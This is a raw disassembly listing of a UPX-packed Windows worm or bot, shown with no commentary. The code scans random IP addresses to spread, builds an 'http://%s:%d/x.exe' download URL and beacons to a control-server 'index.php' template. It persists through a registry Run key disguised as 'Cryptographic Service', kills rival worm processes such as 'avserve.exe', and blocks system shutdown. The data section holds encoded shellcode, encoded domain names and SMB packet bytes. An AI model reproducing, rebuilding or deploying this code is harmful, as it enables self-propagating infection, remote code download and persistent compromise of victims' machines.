jmp short loc_3143266F
; ---------------------------------------------------------------------------
loc_31432687: ; CODE XREF: sub_3143256D+106�j
cmp [ebp+arg_0], edi
jz short loc_314326C5
push offset aWs2_32 ; "ws2_32"
mov esi, dword_314310AC
call esi ; LoadLibraryA
push offset aWininet ; "wininet"
call esi ; LoadLibraryA
push offset aMsvcrt ; "msvcrt"
call esi ; LoadLibraryA
push offset aAdvapi32 ; "advapi32"
call esi ; LoadLibraryA
push offset aUser32 ; "user32"
call esi ; LoadLibraryA
push offset aUterm20 ; "uterm20"
call sub_314320E4
pop ecx
mov dword_31435034, eax
loc_314326C5: ; CODE XREF: sub_3143256D+11D�j
call sub_314324C3
push edi
push offset sub_3143237F
call sub_314320F3
push edi
push offset sub_3143185D
call sub_314320F3
push edi
push offset loc_31432933
call sub_314320F3
add esp, 18h
loc_314326EE: ; CODE XREF: sub_3143256D+19C�j
call sub_31432559
test eax, eax
jnz short loc_3143270B
push edi
call dword_31431018 ; AbortSystemShutdownA
push 1388h
call dword_3143109C ; Sleep
jmp short loc_314326EE
; ---------------------------------------------------------------------------
loc_3143270B: ; CODE XREF: sub_3143256D+188�j
or [ebp+var_4], 0FFFFFFFFh
call nullsub_2
xor eax, eax
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 4
sub_3143256D endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_2. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31432728 proc near ; DATA XREF: sub_3143278A+54�o
; sub_31432810+6A�o ...
var_1 = byte ptr -1
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
cmp byte ptr [ebp+arg_0], 7Fh
jnz short loc_31432737
push 1
pop eax
jmp short locret_31432786
; ---------------------------------------------------------------------------
loc_31432737: ; CODE XREF: sub_31432728+8�j
mov al, byte ptr [ebp+arg_0+3]
push ebx
mov [ebp+var_1], al
xor bl, bl
loc_31432740: ; CODE XREF: sub_31432728+59�j
call sub_31432559
test eax, eax
jnz short loc_31432783
call sub_314321F3
test eax, eax
jz short loc_31432783
cmp [ebp+var_1], bl
jz short loc_3143277C
mov byte ptr [ebp+arg_0+3], bl
push [ebp+arg_0]
call sub_314319BC
pop ecx
call dword_314310FC ; rand
mov ecx, dword_3143504C
xor edx, edx
div ecx
add edx, ecx
push edx
call dword_3143109C ; Sleep
loc_3143277C: ; CODE XREF: sub_31432728+2D�j
inc bl
cmp bl, 0FFh
jb short loc_31432740
loc_31432783: ; CODE XREF: sub_31432728+1F�j
; sub_31432728+28�j
xor eax, eax
pop ebx
locret_31432786: ; CODE XREF: sub_31432728+D�j
leave
retn 4
sub_31432728 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3143278A proc near ; DATA XREF: sub_31432810+7E�o
; UPX0:314329CA�o
arg_0 = dword ptr 8
push ebp
mov ebp, esp
cmp byte ptr [ebp+arg_0], 7Fh
jnz short loc_31432798
push 1
pop eax
jmp short loc_3143280C
; ---------------------------------------------------------------------------
loc_31432798: ; CODE XREF: sub_3143278A+7�j
push esi
push edi
call sub_314320B6
mov esi, dword_314310FC
xor edi, edi
loc_314327A7: ; CODE XREF: sub_3143278A+7C�j
call sub_31432559
test eax, eax
jnz short loc_31432808
call sub_314321F3
test eax, eax
jz short loc_31432808
call esi ; rand
mov byte ptr [ebp+arg_0+2], al
call esi ; rand
push offset dword_31435044
mov byte ptr [ebp+arg_0+3], al
call dword_314310D8 ; InterlockedIncrement
push [ebp+arg_0]
call sub_314319BC
test eax, eax
pop ecx
jnz short loc_314327EA
push [ebp+arg_0]
push offset sub_31432728
call sub_3143210D
pop ecx
pop ecx
loc_314327EA: ; CODE XREF: sub_3143278A+4F�j
call esi ; rand
mov ecx, dword_3143504C
xor edx, edx
div ecx
add edx, ecx
push edx
call dword_3143109C ; Sleep
inc edi
cmp edi, 8000h
jl short loc_314327A7
loc_31432808: ; CODE XREF: sub_3143278A+24�j
; sub_3143278A+2D�j
pop edi
xor eax, eax
pop esi
loc_3143280C: ; CODE XREF: sub_3143278A+C�j
pop ebp
retn 4
sub_3143278A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31432810 proc near ; DATA XREF: UPX0:314329E2�o
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
call sub_314320B6
call sub_31432559
test eax, eax
jnz loc_314328C9
push ebx
mov ebx, dword_3143109C
push esi
mov esi, dword_314310FC
push edi
loc_31432836: ; CODE XREF: sub_31432810+48�j
; sub_31432810+B0�j
call esi ; rand
mov byte ptr [ebp+var_4+1], al
call esi ; rand
mov byte ptr [ebp+var_4+3], al
call esi ; rand
mov byte ptr [ebp+var_4+2], al
loc_31432845: ; CODE XREF: sub_31432810+3C�j
call esi ; rand
cmp al, 7Fh
mov byte ptr [ebp+var_4], al
jz short loc_31432845
call sub_314321B4
mov edi, [ebp+var_4]
cmp edi, eax
jz short loc_31432836
call sub_314321F3
test eax, eax
jz short loc_314328A1
push offset dword_31435044
call dword_314310D8 ; InterlockedIncrement
push edi
call sub_314319BC
test eax, eax
pop ecx
jnz short loc_314328A8
push edi
push offset sub_31432728
call sub_3143210D
pop ecx
mov [ebp+var_8], 4
pop ecx
loc_3143288D: ; CODE XREF: sub_31432810+8D�j
push edi
push offset sub_3143278A
call sub_3143210D
dec [ebp+var_8]
pop ecx
pop ecx
jnz short loc_3143288D
jmp short loc_314328A8
; ---------------------------------------------------------------------------
loc_314328A1: ; CODE XREF: sub_31432810+51�j
push 2710h
call ebx ; Sleep
loc_314328A8: ; CODE XREF: sub_31432810+67�j
; sub_31432810+8F�j
call esi ; rand
mov ecx, dword_3143504C
xor edx, edx
div ecx
add edx, ecx
push edx
call ebx ; Sleep
call sub_31432559
test eax, eax
jz loc_31432836
pop edi
pop esi
pop ebx
loc_314328C9: ; CODE XREF: sub_31432810+11�j
push 0
call dword_314310D4 ; ExitThread
xor eax, eax
leave
retn 4
sub_31432810 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_314328D7 proc near ; CODE XREF: UPX0:314329A7�p
; UPX0:loc_31432A0D�p
var_50 = byte ptr -50h
var_28 = byte ptr -28h
push ebp
mov ebp, esp
sub esp, 50h
push esi
call sub_314321B4
push eax
call dword_31431160 ; inet_ntoa
mov esi, dword_31431068
push eax
lea eax, [ebp+var_28]
push eax
call esi ; lstrcpyA
push dword_3143503C
lea eax, [ebp+var_28]
push eax
lea eax, [ebp+var_50]
push offset aHttpSDX_exe ; "http://%s:%d/x.exe"
push eax
call dword_31431120 ; wsprintfA
add esp, 10h
lea eax, [ebp+var_50]
push eax
push offset word_314342E2
call esi ; lstrcpyA
push offset byte_314342E0
call dword_31431088 ; lstrlenA
mov byte_314342E0[eax], 0DFh
pop esi
leave
retn
sub_314328D7 endp
; ---------------------------------------------------------------------------
loc_31432933: ; DATA XREF: sub_3143256D+174�o
push ecx
push ecx
push ebx
push ebp
push esi
xor ebx, ebx
push edi
mov dword_31435044, ebx
call sub_314321F3
mov esi, dword_3143109C
mov edi, 1388h
test eax, eax
jnz short loc_31432961
loc_31432955: ; CODE XREF: UPX0:3143295F�j
push edi
call esi ; Sleep
call sub_314321F3
test eax, eax
jz short loc_31432955
loc_31432961: ; CODE XREF: UPX0:31432953�j
lea eax, [esp+14h]
push ebx
push eax
call dword_31431134 ; InternetGetConnectedState
test byte ptr [esp+14h], 2
push 50h
mov dword_31435048, ebx
pop ebp
mov dword_3143504C, 96h
jz short loc_314329A0
mov dword_31435048, 1
mov ebp, 15Eh
mov dword_3143504C, 14h
loc_314329A0: ; CODE XREF: UPX0:31432985�j
call sub_314321B4
mov ebx, eax
call sub_314328D7
cmp ebx, 100007Fh
jz short loc_314329C1
push ebx
push offset sub_31432728
call sub_3143210D
pop ecx
pop ecx
loc_314329C1: ; CODE XREF: UPX0:314329B2�j
mov dword ptr [esp+10h], 4
loc_314329C9: ; CODE XREF: UPX0:314329DA�j
push ebx
push offset sub_3143278A
call sub_3143210D
dec dword ptr [esp+18h]
pop ecx
pop ecx
jnz short loc_314329C9
test ebp, ebp
jle short loc_314329F1
loc_314329E0: ; CODE XREF: UPX0:314329EF�j
push 0
push offset sub_31432810
call sub_3143210D
pop ecx
dec ebp
pop ecx
jnz short loc_314329E0
loc_314329F1: ; CODE XREF: UPX0:314329DE�j
; UPX0:314329FD�j ...
call sub_314321F3
test eax, eax
jz short loc_314329FF
push edi
call esi ; Sleep
jmp short loc_314329F1
; ---------------------------------------------------------------------------
loc_314329FF: ; CODE XREF: UPX0:314329F8�j
; UPX0:31432A0B�j
call sub_314321F3
test eax, eax
jnz short loc_31432A0D
push edi
call esi ; Sleep
jmp short loc_314329FF
; ---------------------------------------------------------------------------
loc_31432A0D: ; CODE XREF: UPX0:31432A06�j
call sub_314328D7
jmp short loc_314329F1
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31432A14 proc near ; CODE XREF: sub_31432BAD+93�p
; sub_31432D2E+11A�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
lea eax, [ebp+arg_4]
push eax
push 0F003Fh
push 0
push [ebp+arg_4]
push [ebp+arg_0]
call dword_3143100C ; RegOpenKeyExA
test eax, eax
jnz short loc_31432A47
push [ebp+arg_8]
push [ebp+arg_4]
call dword_31431010 ; RegDeleteValueA
push [ebp+arg_4]
call dword_31431014 ; RegCloseKey
loc_31432A47: ; CODE XREF: sub_31432A14+1C�j
pop ebp
retn
sub_31432A14 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31432A49 proc near ; CODE XREF: sub_3143141F+28E�p
; sub_3143237F+33�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_10]
push esi
mov [ebp+var_4], eax
lea eax, [ebp+arg_10]
push eax
xor esi, esi
push 0F003Fh
push esi
push [ebp+arg_4]
push [ebp+arg_0]
call dword_3143100C ; RegOpenKeyExA
test eax, eax
jz short loc_31432A75
push 1
pop eax
jmp short loc_31432A9F
; ---------------------------------------------------------------------------
loc_31432A75: ; CODE XREF: sub_31432A49+25�j
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+arg_4]
push [ebp+arg_C]
push eax
push esi
push [ebp+arg_8]
push [ebp+arg_10]
call dword_31431008 ; RegQueryValueExA
test eax, eax
jz short loc_31432A94
push 2
pop esi
loc_31432A94: ; CODE XREF: sub_31432A49+46�j
push [ebp+arg_10]
call dword_31431014 ; RegCloseKey
mov eax, esi
loc_31432A9F: ; CODE XREF: sub_31432A49+2A�j
pop esi
leave
retn
sub_31432A49 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31432AA2 proc near ; CODE XREF: sub_3143141F+306�p
; sub_31432C62+96�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push esi
xor esi, esi
lea eax, [ebp+arg_4]
push esi
push eax
push esi
push 0F003Fh
push esi
push esi
push esi
push [ebp+arg_4]
push [ebp+arg_0]
call dword_31431000 ; RegCreateKeyExA
test eax, eax
jz short loc_31432ACB
push 1
pop eax
jmp short loc_31432AF2
; ---------------------------------------------------------------------------
loc_31432ACB: ; CODE XREF: sub_31432AA2+22�j
push [ebp+arg_10]
push [ebp+arg_C]
push 1
push esi
push [ebp+arg_8]
push [ebp+arg_4]
call dword_31431004 ; RegSetValueExA
test eax, eax
jz short loc_31432AE7
push 2
pop esi
loc_31432AE7: ; CODE XREF: sub_31432AA2+40�j
push [ebp+arg_4]
call dword_31431014 ; RegCloseKey
mov eax, esi
loc_31432AF2: ; CODE XREF: sub_31432AA2+27�j
pop esi
pop ebp
retn
sub_31432AA2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31432AF5 proc near ; CODE XREF: sub_31432BAD+9F�p
var_128 = dword ptr -128h
var_120 = dword ptr -120h
var_104 = byte ptr -104h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 128h
push ebx
mov ebx, [ebp+arg_0]
push esi
push ebx
call dword_31431088 ; lstrlenA
mov esi, eax
dec esi
test esi, esi
jle loc_31432BA9
loc_31432B15: ; CODE XREF: sub_31432AF5+27�j
cmp byte ptr [esi+ebx], 5Ch
jz short loc_31432B1E
dec esi
jns short loc_31432B15
loc_31432B1E: ; CODE XREF: sub_31432AF5+24�j
push 0
push 2
call sub_31432EFC ; CreateToolhelp32Snapshot
cmp eax, 0FFFFFFFFh
mov [ebp+arg_0], eax
jz short loc_31432BA9
push 128h
lea eax, [ebp+var_128]
push 0
push eax
call sub_31432EA6 ; memset
add esp, 0Ch
lea eax, [ebp+var_128]
mov [ebp+var_128], 128h
push eax
push [ebp+arg_0]
call sub_31432EF6 ; Process32First
test eax, eax
jz short loc_31432BA9
lea esi, [esi+ebx+1]
loc_31432B66: ; CODE XREF: sub_31432AF5+B2�j
lea eax, [ebp+var_104]
push eax
push esi
call dword_31431104 ; strstr
pop ecx
test eax, eax
pop ecx
jz short loc_31432B96
push [ebp+var_120]
push 0
push 1F0FFFh
call dword_314310B4 ; OpenProcess
push 0
push eax
call dword_31431060 ; TerminateProcess
loc_31432B96: ; CODE XREF: sub_31432AF5+83�j
lea eax, [ebp+var_128]
push eax
push [ebp+arg_0]
call sub_31432EF0 ; Process32Next
test eax, eax
jnz short loc_31432B66
loc_31432BA9: ; CODE XREF: sub_31432AF5+1A�j
; sub_31432AF5+38�j ...
pop esi
pop ebx
leave
retn
sub_31432AF5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31432BAD proc near ; CODE XREF: UPX0:31432536�p
var_13C = byte ptr -13Ch
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 13Ch
push ebx
push esi
lea eax, [ebp+var_34]
push edi
mov [ebp+var_34], offset aWindowsSecurit ; "Windows Security Manager"
mov [ebp+var_30], offset aDiskDefragment ; "Disk Defragmenter"
mov [ebp+var_2C], offset aSystemRestoreS ; "System Restore Service"
mov [ebp+var_28], offset aBotLoader ; "Bot Loader"
mov [ebp+var_24], offset aSystray ; "SysTray"
mov [ebp+var_20], offset aWinupdate ; "WinUpdate"
mov [ebp+var_1C], offset aWindowsUpdateS ; "Windows Update Service"
mov [ebp+var_18], offset aAvserve_exe ; "avserve.exe"
mov [ebp+var_14], offset aAvserve2_exeup ; "avserve2.exeUpdate Service"
mov [ebp+var_10], offset aMsConfigV13 ; "MS Config v13"
mov [ebp+var_C], offset aWindowsUpdate ; "Windows Update"
mov [ebp+var_4], eax
mov [ebp+var_8], 0Bh
mov edi, offset aSoftwareMicr_0 ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
mov esi, 80000002h
loc_31432C1D: ; CODE XREF: sub_31432BAD+AE�j
mov eax, [ebp+var_4]
push 104h
mov ebx, [eax]
lea eax, [ebp+var_13C]
push eax
push ebx
push edi
push esi
call sub_31432A49
add esp, 14h
test eax, eax
jnz short loc_31432C54
push ebx
push edi
push esi
call sub_31432A14
lea eax, [ebp+var_13C]
push eax
call sub_31432AF5
add esp, 10h
loc_31432C54: ; CODE XREF: sub_31432BAD+8E�j
add [ebp+var_4], 4
dec [ebp+var_8]
jnz short loc_31432C1D
pop edi
pop esi
pop ebx
leave
retn
sub_31432BAD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31432C62 proc near ; CODE XREF: sub_31432D2E+D1�p
; sub_31432D2E+132�p
var_78 = byte ptr -78h
var_14 = byte ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 78h
cmp [ebp+arg_0], 0
jz short loc_31432C77
push [ebp+arg_0]
call dword_31431074 ; DeleteFileA
loc_31432C77: ; CODE XREF: sub_31432C62+A�j
lea eax, [ebp+var_78]
push 63h
push eax
call dword_31431090 ; GetSystemDirectoryA
test eax, eax
jz locret_31432D2C
push esi
call dword_314310FC ; rand
and eax, 3
add eax, 5
push eax
lea eax, [ebp+var_14]
push eax
call sub_3143212E
mov esi, dword_3143108C
pop ecx
pop ecx
lea eax, [ebp+var_14]
push offset dword_314341F0
push eax
call esi ; lstrcatA
lea eax, [ebp+var_78]
push offset dword_314341F8
push eax
call esi ; lstrcatA
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_78]
push eax
call esi ; lstrcatA
lea eax, [ebp+var_78]
push 0
push eax
push [ebp+arg_4]
call dword_31431050 ; CopyFileA
lea eax, [ebp+var_78]
push eax
call dword_31431088 ; lstrlenA
inc eax
push eax
lea eax, [ebp+var_78]
push eax
push offset aCryptographicS ; "Cryptographic Service"
push offset aSoftwareMicr_0 ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push 80000002h
call sub_31432AA2
add esp, 14h
push dword_31435034
call dword_31431080 ; CloseHandle
lea eax, [ebp+var_78]
push 0
push eax
call dword_31431054 ; WinExec
push 1F4h
call dword_3143109C ; Sleep
push 0
call dword_314310E4 ; ExitProcess
pop esi
locret_31432D2C: ; CODE XREF: sub_31432C62+23�j
leave
retn
sub_31432C62 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31432D2E proc near ; CODE XREF: UPX0:3143253B�p
var_E8 = byte ptr -0E8h
var_84 = byte ptr -84h
var_20 = byte ptr -20h
push ebp
mov ebp, esp
sub esp, 0E8h
push ebx
push esi
push edi
lea eax, [ebp+var_84]
push 63h
push eax
push 0
call dword_31431048 ; GetModuleFileNameA
test eax, eax
jz loc_31432E67
and dword_31435050, 0
lea eax, [ebp+var_20]
push 1Dh
push eax
mov edi, offset aSoftwareMicr_1 ; "Software\\Microsoft\\Wireless"
push offset aId ; "ID"
mov esi, 80000002h
push edi
push esi
call sub_31432A49
add esp, 14h
test eax, eax
jz short loc_31432DB4
call dword_314310FC ; rand
push 0Ah
mov ebx, offset aGnihgcmsdqchen ; "gnihgcmsdqchenj"
cdq
pop ecx
idiv ecx
add edx, ecx
push edx
push ebx
call sub_3143212E
pop ecx
pop ecx
push ebx
call dword_31431088 ; lstrlenA
inc eax
push eax
push ebx
push offset aId ; "ID"
push edi
push esi
call sub_31432AA2
add esp, 14h
jmp short loc_31432DC3
; ---------------------------------------------------------------------------
loc_31432DB4: ; CODE XREF: sub_31432D2E+4D�j
lea eax, [ebp+var_20]
push eax
push offset aGnihgcmsdqchen ; "gnihgcmsdqchenj"
call dword_31431068 ; lstrcpyA
loc_31432DC3: ; CODE XREF: sub_31432D2E+84�j
lea eax, [ebp+var_E8]
push 63h
push eax
push offset aCryptographicS ; "Cryptographic Service"
push offset aSoftwareMicr_0 ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push esi
call sub_31432A49
add esp, 14h
test eax, eax
jz short loc_31432E09
push 2
push offset a1 ; "1"
push offset aClient ; "Client"
push edi
push esi
call sub_31432AA2
lea eax, [ebp+var_84]
push eax
push 0
call sub_31432C62
add esp, 1Ch
jmp short loc_31432E67
; ---------------------------------------------------------------------------
loc_31432E09: ; CODE XREF: sub_31432D2E+B3�j
lea eax, [ebp+var_84]
push eax
lea eax, [ebp+var_E8]
push eax
call dword_3143104C ; lstrcmpiA
test eax, eax
jnz short loc_31432E52
lea eax, [ebp+var_20]
push 1Dh
mov ebx, offset aClient ; "Client"
push eax
push ebx
push edi
push esi
call sub_31432A49
add esp, 14h
test eax, eax
jnz short loc_31432E67
push ebx
push edi
push esi
mov dword_31435050, 1
call sub_31432A14
add esp, 0Ch
jmp short loc_31432E67
; ---------------------------------------------------------------------------
loc_31432E52: ; CODE XREF: sub_31432D2E+F1�j
lea eax, [ebp+var_84]
push eax
lea eax, [ebp+var_E8]
push eax
call sub_31432C62
pop ecx
pop ecx
loc_31432E67: ; CODE XREF: sub_31432D2E+1F�j
; sub_31432D2E+D9�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_31432D2E endp
; =============== S U B R O U T I N E =======================================
sub_31432E6C proc near ; CODE XREF: sub_314311A0+CA�p
; sub_31431782+11�p ...
arg_0 = dword ptr 4
push 4
push 1000h
push [esp+8+arg_0]
push 0
call dword_31431044 ; VirtualAlloc
retn
sub_31432E6C endp
; =============== S U B R O U T I N E =======================================
sub_31432E80 proc near ; CODE XREF: sub_314311A0+10B�p
; sub_31431782+C0�p
arg_0 = dword ptr 4
push 8000h
push 0
push [esp+8+arg_0]
call dword_31431040 ; VirtualFree
retn
sub_31432E80 endp
; ---------------------------------------------------------------------------
align 10h
loc_31432EA0: ; DATA XREF: sub_3143141F+A�o
; sub_3143256D+A�o
jmp dword ptr loc_31431100
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31432EA6 proc near ; CODE XREF: sub_314319BC+128�p
; sub_314319BC+134�p ...
jmp dword_314310F8
sub_31432EA6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31432EAC proc near ; CODE XREF: sub_314319BC+9C�p
; sub_314319BC+C5�p ...
jmp dword_314310F4
sub_31432EAC endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31432EB2 proc near ; CODE XREF: sub_314319BC+93�p
; sub_314319BC+B2�p ...
jmp dword_314310F0
sub_31432EB2 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_31432EC0 proc near ; CODE XREF: sub_314319BC+8�p
arg_0 = byte ptr 4
push ecx
cmp eax, 1000h
lea ecx, [esp+4+arg_0]
jb short loc_31432EE0
loc_31432ECC: ; CODE XREF: sub_31432EC0+1E�j
sub ecx, 1000h
sub eax, 1000h
test [ecx], eax
cmp eax, 1000h
jnb short loc_31432ECC
loc_31432EE0: ; CODE XREF: sub_31432EC0+A�j
sub ecx, eax
mov eax, esp
test [ecx], eax
mov esp, ecx
mov ecx, [eax]
mov eax, [eax+4]
push eax
retn
sub_31432EC0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31432EF0 proc near ; CODE XREF: sub_31432AF5+AB�p
jmp dword_31431064
sub_31432EF0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31432EF6 proc near ; CODE XREF: sub_31432AF5+64�p
jmp dword_3143105C
sub_31432EF6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31432EFC proc near ; CODE XREF: sub_31432AF5+2D�p
jmp dword_31431058
sub_31432EFC endp
; ---------------------------------------------------------------------------
db 2 dup(0CCh)
dd 43Fh dup(0)
dword_31434000 dd 206h, 2400h, 31415352h, 180h, 10001h, 11838DF5h, 2AEC5279h
; DATA XREF: sub_3143141F+11D�o
; sub_3143141F+20F�o
dd 0E7F63AE4h, 0E0EA9B49h, 0DB21AFBEh, 1A95447Eh, 0A032615Eh
dd 9F6A1F85h, 3994FF94h, 8F26A684h, 5C1DCE35h, 0B20BC9A5h
dd 3072657Ah, 0
aMozilla4_0Co_0 db 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',0
; DATA XREF: sub_31431782+84�o
align 10h
byte_31434080 db 0 ; DATA XREF: sub_3143185D+1B�r
off_31434081 dd offset dword_314341E4 ; DATA XREF: sub_3143185D+23�r
align 2
dd offset dword_314341D4
dw 0C401h
dd 1314341h, 314341B4h, 4341A000h, 41900131h, 80013143h
dd 314341h, 31434174h, 43416800h, 41580131h, 48003143h
dd 1314341h, 3143413Ch, 43417400h, 41D40131h, 30003143h
dd 314341h, 314341D4h, 43412001h, 41480031h, 10013143h
dd 314341h, 31434130h, 43410001h, 40F80131h, 74003143h
dd 314341h, 31434130h, 2E767663h, 7572h, 2E777777h, 6C646572h
dd 2E656E69h, 7572h, 656C6966h, 72616573h, 722E6863h, 75h
dd 6F626F72h, 61686378h, 2E65676Eh, 6D6F63h, 68746566h
dd 2E647261h, 7A6962h, 63657361h, 2E616B68h, 7572h, 7473616Dh
dd 782D7265h, 6D6F632Eh, 0
dd 6F6C6F63h, 61622D72h, 722E6B6Eh, 75h, 6B76616Bh, 742E7A61h
dd 76h, 74757263h, 6E2E706Fh, 75h, 6F64696Bh, 61622D73h
dd 722E6B6Eh, 75h, 65726170h, 61622D78h, 722E6B6Eh, 75h
dd 6C756461h, 6D652D74h, 65726970h, 6D6F632Eh, 0
dd 666E6F6Bh, 616B7369h, 726F2E74h, 67h, 69746963h, 6E61622Dh
dd 75722E6Bh, 0
dword_314341D4 dd 72617778h, 6A632E65h, 656E2E62h, 74hdword_314341E4 dd 617A616Dh, 616B6166h, 75722Ehdword_314341F0 dd 6578652Eh, 0 ; sub_31432239+55�o ...
dword_314341F8 dd 5Ch ; sub_31432C62+56�o
aMozilla4_0Comp db 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',0
; DATA XREF: sub_314311A0+13�o
align 10h
aAbcdefghijkl_0 db 'abcdefghijklmnopqrstuvwxyz',0 ; DATA XREF: sub_31431313+1C�o
align 4
aAbcdefghijklmn db 'ABCDEFGHIJKLMNOPQRSTUVWXYZ',0 ; DATA XREF: sub_31431313+C�o
align 4
aD db '%d',0 ; DATA XREF: sub_3143141F+2CC�o
align 4
dword_3143426C dd 444952h aSoftwareMicros db 'Software\Microsoft\Wireless',0 ; DATA XREF: sub_3143141F+259�o
aZer1 db 'zer1',0 ; DATA XREF: sub_3143141F:loc_314315B7�o
align 4
aZer0 db 'zer0',0 ; DATA XREF: sub_3143141F+34�o
align 4
aHttpS db 'http://%s',0 ; DATA XREF: sub_31431782+71�o
align 4
aHttpSIndex_php db 'http://%s/index.php?id=%s&scn=%d&inf=%d&ver=20&cnt=%s',0
; DATA XREF: sub_31431782+57�o
align 10h
byte_314342E0 db 0EBh ; DATA XREF: sub_314319BC+24E�o
; sub_314319BC+260�o ...
db 58h
word_314342E2 dw 7468h ; DATA XREF: sub_314328D7+40�o
dd 2F3A7074h, 3732312Fh, 302E302Eh, 383A312Eh, 652F3030h
dd 6578652Eh, 4 dup(0DFDFDFDFh), 7A6F4DDFh, 616C6C69h
dd 302E342Fh, 0C9335DDFh, 1EEB966h, 8B05758Dh, 3C068AFEh
dd 46057599h, 302C068Ah, 88993446h, 0EDE24707h, 0DAE80AEBh
dd 2EFFFFFFh, 2E676562h, 0C9999371h, 0C999C999h, 91BDFD12h
dd 0C99916FDh, 0AA6872C1h, 0AA66FD42h, 14BA10FDh, 9998A91Ch
dd 0C9C999C9h, 98F198F3h, 9986C999h, 98C071C9h, 0C999C999h
dd 37CB5F90h, 1C965992h, 99C99978h, 14C999C9h, 7D7157E4h
dd 0C999C999h, 0E414C999h, 9945713Ah, 99C999C9h, 0F19DF3C9h
dd 9989C999h, 0F1C999C9h, 0C999C999h, 0F3C9999Ch, 0B371C999h
dd 99C99998h, 0E3F367C9h, 0DC1C10F0h, 99C99998h, 0C959B2C9h
dd 0C99BF3C9h, 0C999F1C9h, 0C999C999h, 0A10414D9h, 99C99998h
dd 9E71CAC9h, 99C99998h, 61688DC9h, 0AD1C1091h, 99C99998h
dd 66611AC9h, 99111D96h, 99C999C9h, 0C850B2C9h, 98F3C8C8h
dd 0C957DC14h, 0C9992571h, 0C999C999h, 91C0A44Eh, 59924912h
dd 59B2F7EDh, 0C9C9C9C9h, 0CA3AC414h, 993B71CBh, 99C999C9h
dd 0E424FFC9h, 0ED599221h, 0F1CDCDCFh, 0C999C999h, 66C9999Ch
dd 9998DC2Ch, 0C9C999C9h, 0C9991E71h, 0C999C999h, 83B8B0FBh
dd 5D12CDC3h, 0C9C999F3h, 0DC2C66CBh, 99C99998h, 0AD2C66C9h
dd 99C99998h, 990B71C9h, 99C999C9h, 0A6485AC9h, 2C66C096h
dd 0C99998ADh, 1B71C999h, 0C999C999h, 294CC999h, 9CF3EBA7h
dd 98A10414h, 0C999C999h, 99E971CAh, 99C999C9h, 26F434C9h
dd 0C999F371h, 0C999FC71h, 0C999C999h, 0EF133BF9h, 376B4629h
dd 9966DE5Fh, 0A8EC5AC9h, 99C999A0h, 99C999C9h, 0B7C999C9h
dd 0E9EDFFC5h, 0B7FDE9ECh, 99FCE1FCh, 6 dup(99C999C9h)
dd 0FCF5CAC9h, 0C999E9FCh, 0F7EBFCF2h, 0ABAAF5FCh, 34C7C999h
dd 0B459AAF9h, 662A2A25h, 9093ACC9h, 9CC9B781h, 83639D90h
dd 9271CDC9h, 0C999C999h, 19BFC999h, 0FD145135h, 720A95BDh
dd 0F934C791h, 0C999C871h, 0C999C999h, 12A5D212h, 9AE180D5h
dd 146FAA52h, 0C89A2A8Dh, 9A8B12B9h, 5859AA4Ah, 9BAB9E59h
dd 99A319DBh, 0A26CECC9h, 0ED85BDDDh, 0E8A2DF9Eh, 5544EB81h
dd 9ABDC812h, 8D2E964Ah, 85D812EBh, 9D125A9Ah, 105A9A09h
dd 0F885BDDDh, 98D01C10h, 0C999C999h, 7F664966h, 8712FEFDh
dd 12C999A9h, 0C21295C2h, 12821285h, 0B75A91C2h, 0B7FDF7FCh
dd 0
dword_314345A8 dd 85000000h, 424D53FFh, 72h, 0C8531800h, 3 dup(0)
